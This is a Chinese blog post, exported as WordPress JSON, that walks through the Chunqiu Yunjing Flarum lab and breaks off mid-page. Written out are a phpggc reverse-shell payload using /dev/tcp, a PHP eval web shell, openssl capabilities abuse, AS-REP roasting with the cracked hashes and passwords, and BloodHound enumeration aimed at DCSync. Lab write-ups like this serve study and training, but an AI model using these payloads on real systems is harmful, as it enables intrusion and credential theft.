{"id":2626,"date":"2023-09-30T21:04:03","date_gmt":"2023-09-30T13:04:03","guid":{"rendered":"https:\/\/fushuling.com\/?p=2626"},"modified":"2023-10-15T00:00:09","modified_gmt":"2023-10-14T16:00:09","slug":"%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7flarum","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/09\/30\/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7flarum\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883\u00b7Flarum"},"content":{"rendered":"\n<p>\u8003\u70b9\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Flarum\u540e\u53f0RCE<\/li>\n\n\n\n<li>capabilities\u63d0\u6743\u2014\u2014openssl\u547d\u4ee4<\/li>\n\n\n\n<li>AS-REP Roasting<\/li>\n\n\n\n<li>\u6293xshell\u5bc6\u7801<\/li>\n\n\n\n<li>Acount Operators\u7ec4\u7528\u6237\u6253RBCD<\/li>\n\n\n\n<li>DCSync<\/li>\n<\/ul>\n\n\n\n<p>rockyou\u542f\u52a8\uff1aadministrator::1chris<\/p>\n\n\n\n<p>\u540e\u53f0\u5982\u4f55\u62ffshell\u5c31\u8981\u770bp\u725b\u7684\u5f53\u5e74\u600e\u4e48\u6316Flarum 0day\u7684\u6587\u7ae0(<a href=\"https:\/\/tttang.com\/archive\/1714\/\">\u4ece\u5076\u9047Flarum\u5f00\u59cb\u7684RCE\u4e4b\u65c5<\/a>)\u4e86\uff0c\u5728\u6211\u521a\u5b66\u5b89\u5168\u7684\u65f6\u5019\u5c31\u62dc\u8bfb\u8fc7\u4e00\u6b21\uff0c\u4e3ap\u725b\u7814\u7a76\u95ee\u9898\u548c\u5206\u6790\u4ee3\u7801\u7684\u601d\u8def\u548c\u80fd\u529b\u800c\u9707\u64bc\uff0c\u73b0\u5728\u4e5f\u4e00\u76f4\u5728\u5411p\u725b\u7684\u5883\u754c\u5b66\u4e60\uff0c\u53ea\u4e0d\u8fc7\u8d8a\u5b66\u8d8a\u611f\u89c9\u5dee\u8ddd\u5927Orz<\/p>\n\n\n\n<p>\u6000\u7740\u671d\u5723\u7684\u5fc3\u7406\uff0c\u8ba9\u6211\u4eec\u6309\u7740p\u725b\u7684\u535a\u5ba2\u5f00\u59cbRCE\u3002\u5148\u4e0b\u4e00\u4e2a<a href=\"https:\/\/github.com\/ambionics\/phpggc\">phpggc<\/a>\uff0c\u4e00\u79cd\u7c7b\u4f3c\u4e8eyso\u4f46\u662f\u9488\u5bf9php\u7684\u53cd\u5e8f\u5217\u5316\u5229\u7528\u5de5\u5177\uff0c\u8fd9\u91cc\u4e3a\u4e86\u53ef\u63a7\u6587\u4ef6\u5934\uff0c\u6211\u4eec\u4f7f\u7528phpggc\u6765\u751f\u6210tar\u683c\u5f0f\u5305\uff0c\u91cc\u9762\u5185\u5bb9\u5c31\u662f\u53cd\u5f39shell\u7684\u547d\u4ee4\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/phpggc -p tar -b Monolog\/RCE6 system \"bash -c 'bash -i &gt;&amp; \/dev\/tcp\/url\/9383 0&gt;&amp;1'\"<\/code><\/pre>\n\n\n\n<p>\u7f16\u8bd1\u6210\u529f\u540e\u4f1a\u751f\u6210\u4e00\u5927\u5806base64\u4ee3\u7801\uff0c\u590d\u5236\u8fc7\u6765\uff0c\u5728\u540e\u53f0\u4fee\u6539css\u90a3\u91cc\u66ff\u6362\u4e0b\u9762\u4ee3\u7801\u7684xxx<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>@import (inline) 'data:text\/css;base64,xxx';<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/1-88-1024x538.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"538\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/1-88-1024x538.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2630\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u63a5\u7740\u8bbf\u95ee\u4e00\u4e0b\u4e3b\u987539.98.107.139\u786e\u4fddcss\u6837\u5f0f\u5df2\u7ecf\u6210\u529f\u4fee\u6539\uff0c\u63a5\u4e0b\u6765\u518d\u6b21\u4fee\u6539\u81ea\u5b9a\u4e49CSS\uff0c\u4f7f\u7528phar\u534f\u8bae\u5305\u542b\u6211\u4eec\u4fee\u6539\u7684css\u6587\u4ef6<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.test {\n    content: data-uri('phar:\/\/.\/assets\/forum.css');\n}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/2-13-1024x726.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"726\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/2-13-1024x726.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2632\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u56e0\u4e3a\u5b83\u8981\u7f16\u8bd1\u4e00\u6bb5\u65f6\u5019\uff0c\u6240\u4ee5\u70b9\u51fb\u4fdd\u5b58\u4f1a\u5361\u4e00\u4f1a\u513f\uff0c\u8fd9\u5c31\u8bc1\u660e\u6267\u884c\u6210\u529f\u4e86\uff0c\u6210\u529f\u5f39shell<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/3-7.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"467\" height=\"91\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/3-7.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2631\"  sizes=\"auto, (max-width: 467px) 100vw, 467px\" \/><\/div><\/figure>\n\n\n\n<p>\u63a5\u4e0b\u6765\u5199\u4e2a\u9a6c\u597d\u4e0a\u8681\u5251<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>echo \"&lt;?php @eval(\\$_POST&#91;1]);?&gt;\" &gt; 1.php<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/4-5.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"808\" height=\"127\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/4-5.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2633\"  sizes=\"auto, (max-width: 808px) 100vw, 808px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fde\u4e0a\u53bb\u540eflag\u5728root\u76ee\u5f55\uff0csuid\u63d0\u6743\u6ca1\u6cd5\uff0c\u4e0d\u8fc7\u53ef\u4ee5capabilities\u63d0\u6743\uff0c\u53c2\u8003\u4e0b\u9762\u7684\u6587\u7ae0<\/p>\n\n\n\n<p><a href=\"https:\/\/www.cnblogs.com\/f-carey\/p\/16026088.html\">Linux\u63d0\u6743\u4e4b\uff1a\u5229\u7528capabilities\u63d0\u6743<\/a><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>getcap -r \/ 2&gt;\/dev\/null<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/5-4.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"963\" height=\"156\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/5-4.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2634\"  sizes=\"auto, (max-width: 963px) 100vw, 963px\" \/><\/div><\/figure>\n\n\n\n<p>\u6709openssl\u547d\u4ee4\u53ef\u4ee5\u5229\u7528<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>openssl enc -in \"\/root\/flag\/flag01.txt\"<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/6-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"808\" height=\"188\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/6-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2635\"  sizes=\"auto, (max-width: 808px) 100vw, 808px\" \/><\/div><\/figure>\n\n\n\n<p>\u63a5\u4e0b\u6765\u6253\u5185\u7f51\u8001\u6d41\u7a0b\uff0cfscan\u626b\u5185\u7f51\uff0cStowaway\u5efa\u4ee3\u7406<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>172.22.60.8:139 open\n172.22.60.42:135 open\n172.22.60.15:135 open\n172.22.60.8:135 open\n172.22.60.52:80 open\n172.22.60.52:22 open\n172.22.60.42:445 open\n172.22.60.15:445 open\n172.22.60.8:445 open\n172.22.60.42:139 open\n172.22.60.15:139 open\n172.22.60.8:88 open\n&#91;*] NetInfo:\n&#91;*]172.22.60.42\n   &#91;-&gt;]Fileserver\n   &#91;-&gt;]172.22.60.42\n   &#91;-&gt;]169.254.83.27\n&#91;*] NetInfo:\n&#91;*]172.22.60.8\n   &#91;-&gt;]DC\n   &#91;-&gt;]172.22.60.8\n   &#91;-&gt;]169.254.42.35\n&#91;*] NetBios: 172.22.60.8     &#91;+]DC XIAORANG\\DC              \n&#91;*] NetBios: 172.22.60.15    XIAORANG\\PC1                   \n&#91;*] NetInfo:\n&#91;*]172.22.60.15\n   &#91;-&gt;]PC1\n   &#91;-&gt;]172.22.60.15\n   &#91;-&gt;]169.254.178.145\n&#91;*] NetBios: 172.22.60.42    XIAORANG\\FILESERVER            \n&#91;*] WebTitle: http:\/\/172.22.60.52       code:200 len:5867   title:\u9704\u58e4\u793e\u533a<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>172.22.60.52 \u672c\u673a(getshell)\n172.22.60.15 PC1\n172.22.60.42 FILESERVER\n172.22.60.8 DC<\/code><\/pre>\n\n\n\n<p>\u4e4b\u524d\u767b\u540e\u53f0\u7684\u65f6\u5019\u770b\u5230\u6709\u5f88\u591axxx@xiaorang.com\u7684email\uff0c\u6309\u7167\u6625\u79cb\u4e91\u955c\u4e4b\u524d\u9898\u76ee\u7684\u98ce\u683c\uff0c\u4f30\u8ba1\u662f\u8981\u6253AS-REP Roasting\uff0c\u5148\u67e5\u770b\u4e00\u4e0b\u6570\u636e\u5e93\u4fe1\u606f\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/7-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"733\" height=\"518\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/7-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2636\"  sizes=\"auto, (max-width: 733px) 100vw, 733px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php return array (\n  'debug' =&gt; false,\n  'database' =&gt; \n  array (\n    'driver' =&gt; 'mysql',\n    'host' =&gt; 'localhost',\n    'port' =&gt; 3306,\n    'database' =&gt; 'flarum',\n    'username' =&gt; 'root',\n    'password' =&gt; 'Mysql@root123',\n    'charset' =&gt; 'utf8mb4',\n    'collation' =&gt; 'utf8mb4_unicode_ci',\n    'prefix' =&gt; 'flarum_',\n    'strict' =&gt; false,\n    'engine' =&gt; 'InnoDB',\n    'prefix_indexes' =&gt; true,\n  ),\n  'url' =&gt; 'http:\/\/'.$_SERVER&#91;'HTTP_HOST'],\n  'paths' =&gt; \n  array (\n    'api' =&gt; 'api',\n    'admin' =&gt; 'admin',\n  ),\n  'headers' =&gt; \n  array (\n    'poweredByHeader' =&gt; true,\n    'referrerPolicy' =&gt; 'same-origin',\n  ),\n);<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u8fde\u63a5\u6570\u636e\u5e93\uff0c\u8fd9\u91cc\u6211\u7528\u8681\u5251\u6ca1\u8fde\u4e0a\u53bb\uff0c\u5f88\u62bd\u8c61\uff0c\u660e\u660e\u8bbe\u7f6e\u4e86\u4ee3\u7406\u8fd8\u662f\u4e0d\u884c\uff0c\u540e\u9762\u7528\u7684Proxifier\u8bbe\u7f6e\u5168\u5c40\u4ee3\u7406\u7528navicat\u8fde\u63a5\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/8-3.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/8-3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2637\" style=\"width:496px;height:588px\" width=\"496\" height=\"588\"  sizes=\"auto, (max-width: 496px) 100vw, 496px\" \/><\/div><\/figure>\n\n\n\n<p>navicat\u6709\u4e2a\u597d\u5904\uff0c\u80fd\u6307\u5b9a\u5217\u5bfc\u51fa<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/9-2-1024x576.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/9-2-1024x576.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2638\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540eAS-REP Roasting<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains4 impacket-GetNPUsers -dc-ip 172.22.60.8  xiaorang.lab\/ -usersfile flarum_users.txt<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>$krb5asrep$23$wangyun@XIAORANG.LAB:7113eff57f6a311ae31c6954239295c4$6d61457220f4a148bdb66b2eb60186c19fb59036b11408b4a16030a55f2e578917decac987e4bef1e5b758211a8a6657d7dcd7497a4f9f8d8574f19080146e794982c7dc0b9b86510cadc4c3ff84a7afef6fd51000c46cba3868799e5fe89a824acb90903b5e5a5da72503f30a8c9d016f298b2d3686bb75abfc48a7a2d31adc45600d6718c8b8b9712855c5f157c64f163e24fba17b0f926a62821344782e519d392da64129562cc04d0a098cdfb9d3c0101519c3b6c359467e061672ddde3853fa0101e1d6fa384cb4df313b6b6c4b0c8c8269f54dc9a4f04392ea6ad7c37084f0e3519e827a66f113f86b\n$krb5asrep$23$zhangxin@XIAORANG.LAB:6a1df11dffef818977a03d01e7e34240$cc37025841b68c245336912104d4a4f0585c81685912feb5a08fe36e2c38e3ff550cc2902b8d7af2ad2846b4f6e9f785691b06d036c2941003af6eb13317da739a7fbd9779629345134d2d15b641684e477834e24eb9dc1fce6c912d9655813526175a3de0af09d778072cf2be2e7ef1d15e0b57850ebcb2e549d9e1638dde0f5f6809cd880635c759cf5074c238179b5377e5735b01be55b68f3f339eebe4382722d061b070ac328f912b2118efdafa99f81f5a7260ec253bafca4ebacae63e86627a20a2b80e5e1fd326a537d8c5d88a95273584549e47af14b54ee36a3c99244ef1405164903d963e4593<\/code><\/pre>\n\n\n\n<p>\u7206\u4e00\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>hashcat -a 0 -m 18200 --force 1.txt \/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/10-3.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"660\" height=\"489\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/10-3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2639\"  sizes=\"auto, (max-width: 660px) 100vw, 660px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>wangyun@XIAORANG.LAB::Adm12geC<\/code><\/pre>\n\n\n\n<p>\u4e0b\u9762\u7528\u8fd9\u4e2a\u7528\u6237\u548c\u5bc6\u7801\u8dd1\u4e00\u4e0bbloodhound<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains bloodhound-python -u wangyun -p Adm12geC -d xiaorang.lab -c all -ns 172.22.60.8 --zip --dns-tcp<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/11-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"758\" height=\"557\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/11-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2640\"  sizes=\"auto, (max-width: 758px) 100vw, 758px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u53ef\u4ee5\u53d1\u73b0zhangxin\u7528\u6237\u5c5e\u4e8eAcount Operators, \u56e0\u6b64\u5bf9\u57df\u5185\u975e\u57df\u63a7\u7684\u6240\u6709\u673a\u5668\u90fd\u5177\u6709GenericAll\u6743\u9650\uff0c\u800cFILESERVER\u673a\u5668\u6709DCSync\uff0c\u8fd9\u4e2a\u5c31\u662f\u9898\u76ee\u63cf\u8ff0\u91cc\u8bf4\u7684\u9ed1\u5ba2\u7559\u4e0b\u7684\u57df\u63a7\u5236\u5668\u540e\u95e8\uff0c\u6240\u4ee5\u601d\u8def\u5f88\u660e\u663e\uff0c\u5c31\u662f\u7528zhangxin\u5bf9FILESERVER\u914d\u7f6eRBCD, \u7136\u540eDCSync\u62ff\u4e0b\u57df\u63a7\u3002<\/p>\n\n\n\n<p>\u56e0\u6b64\u4e0b\u4e00\u6b65\u601d\u8def\u80af\u5b9a\u5c31\u662f\u83b7\u53d6zhangxin\u8fd9\u4e2a\u7528\u6237\u7684\u4fe1\u606f\u4e86\uff0cDC\u548cFILESERVER\u80af\u5b9a\u662f\u540e\u9762\u6253\u7684\uff0c\u7a81\u7834\u53e3\u5728\u8fd9\u4e2aPC1\uff0c\u5148\u626b\u4e00\u4e0b\u7aef\u53e3<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/fscan_amd64 -h 172.22.60.15  -p 1-65535 <\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>172.22.60.15:445 open\n172.22.60.15:139 open\n172.22.60.15:135 open\n172.22.60.15:3389 open<\/code><\/pre>\n\n\n\n<p>\u5f00\u4e863389\uff0crdp\u4e0a\u53bb\uff0c\u91cc\u9762\u6709\u4e2axshell\uff0c\u5176\u4e2d\u6709zhangxin\u7528\u6237\uff0c\u4f46\u662f\u6ca1\u6cd5\u770b\u5bc6\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/13-3-1024x634.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"634\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/13-3-1024x634.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2641\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u73a9\u8fc7\u53d6\u8bc1\u7684\u5e94\u8be5\u90fd\u63a5\u89e6\u8fc7\u7834\u89e3xshell\uff0c\u8fd9\u91cc\u7528\u6700\u7b80\u5355\u7684SharpXDecrypt\u5c31\u80fd\u6293\u5bc6\u7801\u4e86(https:\/\/github.com\/JDArmy\/SharpXDecrypt\/)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/09\/14-3-1024x482.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  